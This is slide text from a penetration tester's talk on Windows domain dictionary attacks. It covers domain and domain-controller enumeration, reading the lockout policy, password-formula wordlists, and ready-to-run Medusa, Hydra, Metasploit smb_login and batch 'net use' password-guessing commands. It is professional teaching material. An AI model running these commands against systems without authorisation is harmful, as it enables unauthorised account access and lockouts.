2. Who am I?
Scott Sutherland
• Security Consultant @ NetSPI
• Over 10 years of consulting experience
• Security researcher: Blogs, white papers,
tools etc
3. Presentation Goals
• Identify the value of dictionary attacks
• Provide new penetration testers with a safe
approach to Windows dictionary attacks
• Provide security professionals with questions
they should be asking their contractors
5. Why dictionary attacks?
What are the goals?
• Identify accounts configured with weak or
default passwords – “It’s human nature”
• Use accounts as entry points during penetration
tests
What’s the impact?
• Unauthorized access to critical:
‒ Systems
‒ Applications
‒ data
• User impersonation
6. Are There Alternatives?
Yes.
Approaches typically includes:
• Cracking pw hashes offline with:
‒ Pre-computed hash libraries like Rainbow
Tables
‒ Brute force and dictionary techniques using
tools like Hashcat and John the Ripper
• Dumping clear text passwords from
interactive sessions with Mimikatz
8. Dictionary Attacks: Process Overview
Windows Dictionary Attack Process
1. Identify domains
2. Enumerate domain controllers
3. Enumerate domain users
4. Enumerate domain lockout policy
5. Create a dictionary
6. Perform Attack
9. Identify Domains: Methods
Unauthenticated Methods
• DHCP Information
• NetBIOS Queries
• DNS Queries
• Sniffing Network Traffic
• Review RDP drop down lists
Authenticated Methods
• Review the output of the SET command for
“USERDNSDOMAIN”
• Review the registry for the default domain
10. Identify Domains: Tools
Method Tools Auth
DHCP Info IPCONFIG
No
NetBIOS Queries NETSTAT –A <IP> No
DNS Queries nmap -sL <IP Range> -oA output_rnds
./reverseraider -r <IP Range>
./dnswalk victem.com
perl fierce.pl -dns <domainname> -threads
5 -file <domainame>-dns.output
No
Sniffing Wireshark (GUI) + Filter for browser traffic
Network Miner (GUI)
Etherape (GUI)
No
RDP Drop Down nmap –sS –PN –p3389 <IP Range>
Then visit with RDP client
No
11. Enumerate DCs: Methods
Unauthenticated Methods
• DNS Queries
• RPC Queries
• Port Scanning
• NetBIOS Scanning
Authenticated Methods
• NET GROUP commands
• LDAP Queries
12. Enumerate DCs: Tools
Methods Tools Auth
DNS Queries NSLOOKUP –type=SRV _ldap._tcp.<domain>
No
RPC Queries NLTEST /DCLIST <domain>
FindPDC <domain> <request count>
No
Port Scanning NMAP –sS –p389,636 –PN <IP Range>
No
NetBIOS
Scanning
FOR /F “tokens=*” %i in (‘type ips.txt’) do NBTSTAT
–A %i
No
NET GROUP
Command
Net group “Domain Controllers” /domain
Yes
LDAP Queries LDAP Administrator (GUI Tool)
Hyena (GUI Tool)
adfind -b -sc dcdmp <domain> -gc | grep -i “>name:”
| gawk -F ” ” “{print $2}” | sort | uniq
Yes
&
No
16. Get Domain Lockout Policy: Methods
Unauthenticated Methods
• RPC Endpoints
Authenticated Methods
• NET ACCOUNTS
Command
What does it all mean?
• Threshold, duration,
and window
Lockout
threshold: 5
Lockout
duration: 15
Lockout
observation
window : 15
17. Get Domain Lockout Policy: Tools
Methods Tools Auth
RPC Queries Enum –P <IP Address>
dumpsec.exe /computer=<IP> /rpt=policy
/saveas=csv /outfile=domain_policy.txt
Yes
&
No
NET
ACCOUNTS
COMMAND
NET ACCOUNTS
YEs
18. Create a Dictionary: Methods
Classics Still Work
• Blank
• Username as password
• password
Common Formulas = Most Effective
• <Password><Number>
• <Companyname><Number>
• <Season><Year>
• <Sports team>Number>
Popular Dictionaries
• Metasploit dictionaries
• Rock you
• FuzzDB
• John the ripper
19. Create a Dictionary: Tools
Dictionary URLs / Lists
Classics Blank password
Username as password
password as password
Formulas
<Password><Number>
<Companyname><Number>
<Season><Year>
<Sports team>Number>
Your Brain! Think of keywords relative to the target
company /geographic location and you’ll get more out
of your dictionary attacks!
Rockyou http://www.skullsecurity.org/wiki/index.php/Passwords
FuzzDB http://code.google.com/p/fuzzdb/
https://github.com/rustyrobot/fuzzdb
John the Ripper http://www.openwall.com/wordlists/
20. Perform Dictionary Attack: Rules
The Rule to Live By:
Respect the lockout policy
• General idea = Attempt a few passwords for all
of the domain users each round, not a 1000
passwords against one user
• Subtract 2 attempts from the lockout policy
Example: Lockout=5, Attempts=3
• Wait 5 to 10 minutes beyond the observation
window
21. Perform Dictionary Attack: Tools
Tools Commands OS
Medusa medusa -H hosts.txt -U users.txt -P passwords.txt -
T 20 -t 10 -L -F -M smbnt
Linux
Bruter Easy to use GUI and not CLI that I know of.
Windows
Metasploit
smb_login
ruby c:metasploitmsf3msfcli
auxiliary/scanner/smb/smb_login THREADS=5
BLANK_PASSWORDS=true USER_AS_PASS=true
PASS_FILE=c:passwords.txt
USER_FILE=c:allusers.txt SMBDomain=.
RHOSTS=192.168.1.1 E
Windows
and Linux
Hydra hydra.exe -L users.txt -P passwords.txt -o
credentials.txt <ip> smb
Windows
and Linux
Batch Script FOR /F “tokens=*” %a in (‘type passwords.txt’) do
net user <ip>IPC$ /user:<user> %a
Windows
22. Conclusions
• There is more than one way to do
everything!
• Enumerate all available options
• It’s easy to lockout accounts – respect the
password policy
• Always ask contractors what their approach
is to reduce the chance of account lockouts
during penetration tests